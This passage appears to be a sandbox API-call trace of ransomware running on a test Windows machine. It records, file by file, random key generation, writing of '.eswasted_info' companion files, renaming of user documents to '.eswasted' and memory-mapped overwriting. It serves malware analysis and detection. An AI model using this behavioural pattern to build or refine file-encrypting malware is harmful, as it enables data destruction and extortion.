dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.526] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.526] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.526] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.527] SetEndOfFile (hFile=0xfc) returned 1 [0071.527] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.528] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.528] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.528] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.529] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5061 [0071.529] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5061) returned 0x2d0000 [0071.529] CloseHandle (hObject=0x118) returned 1 [0071.532] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.533] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.533] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.533] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.534] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.534] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.542] SetEndOfFile (hFile=0xfc) returned 1 [0071.544] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.544] CloseHandle (hObject=0xfc) returned 1 [0071.545] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.545] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e42d8 | out: hHeap=0x4a0000) returned 1 [0071.546] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.546] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.546] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.546] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0071.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4e1ab8 [0071.546] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.546] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.547] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.547] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.547] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.547] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.548] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.549] SetEndOfFile (hFile=0xfc) returned 1 [0071.549] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.549] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.549] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted")) returned 1 [0071.550] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.550] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.550] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x2213 [0071.550] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2213) returned 0x2d0000 [0071.550] CloseHandle (hObject=0x100) returned 1 [0071.585] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.586] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.586] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.586] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.586] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.586] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.595] SetEndOfFile (hFile=0xfc) returned 1 [0071.597] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.597] CloseHandle (hObject=0xfc) returned 1 [0071.598] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.598] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e43d0 | out: hHeap=0x4a0000) returned 1 [0071.598] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.599] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.599] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0071.599] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28e) returned 0x4e1ab8 [0071.599] lstrcpyW (in: lpString1=0x4e1b3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.599] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.599] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.600] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.600] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.600] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.601] SetEndOfFile (hFile=0xfc) returned 1 [0071.601] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.602] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.602] lstrcpyW (in: lpString1=0x4e1b3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted")) returned 1 [0071.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.640] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.640] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x49a [0071.640] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49a) returned 0xb10000 [0071.640] CloseHandle (hObject=0x120) returned 1 [0071.642] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.643] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.643] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.643] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.644] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.644] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.652] SetEndOfFile (hFile=0xfc) returned 1 [0071.654] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.654] CloseHandle (hObject=0xfc) returned 1 [0071.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.656] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9658 | out: hHeap=0x4a0000) returned 1 [0071.656] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.657] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.657] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.657] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0071.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4e1ab8 [0071.657] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.657] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.657] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.658] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.658] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.658] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.659] SetEndOfFile (hFile=0xfc) returned 1 [0071.659] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.659] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.659] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted")) returned 1 [0071.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.701] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.701] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x499 [0071.701] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x499) returned 0x2d0000 [0071.701] CloseHandle (hObject=0xf8) returned 1 [0071.703] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.704] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.704] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.704] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.705] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.705] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.713] SetEndOfFile (hFile=0xfc) returned 1 [0071.716] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.716] CloseHandle (hObject=0xfc) returned 1 [0071.717] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.717] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d98f8 | out: hHeap=0x4a0000) returned 1 [0071.717] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.718] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.718] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0rcI8dNPsQa.ots") returned 57 [0071.718] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4e1ab8 [0071.718] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.718] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.718] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.719] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.719] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0rcI8dNPsQa.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0rci8dnpsqa.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.721] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.722] SetEndOfFile (hFile=0xfc) returned 1 [0071.722] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.722] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.722] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0rcI8dNPsQa.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0rci8dnpsqa.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0rcI8dNPsQa.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0rci8dnpsqa.ots.eswasted")) returned 1 [0071.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0rcI8dNPsQa.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0rci8dnpsqa.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.724] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0071.724] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x53a5 [0071.724] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53a5) returned 0x2d0000 [0071.724] CloseHandle (hObject=0x100) returned 1 [0071.728] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.729] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.729] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.729] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.730] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.730] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.738] SetEndOfFile (hFile=0xfc) returned 1 [0071.741] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.741] CloseHandle (hObject=0xfc) returned 1 [0071.742] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.743] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8c68 | out: hHeap=0x4a0000) returned 1 [0071.743] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.743] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.743] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.743] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\22Df7iMWnQgkG.jpg") returned 70 [0071.743] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4e1ab8 [0071.744] lstrcpyW (in: lpString1=0x4e1b44, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.744] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.744] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.744] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.744] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\22Df7iMWnQgkG.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\22df7imwnqgkg.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.745] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.746] SetEndOfFile (hFile=0xfc) returned 1 [0071.746] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.746] HeapFree (in: hHeap=0x4a0000, 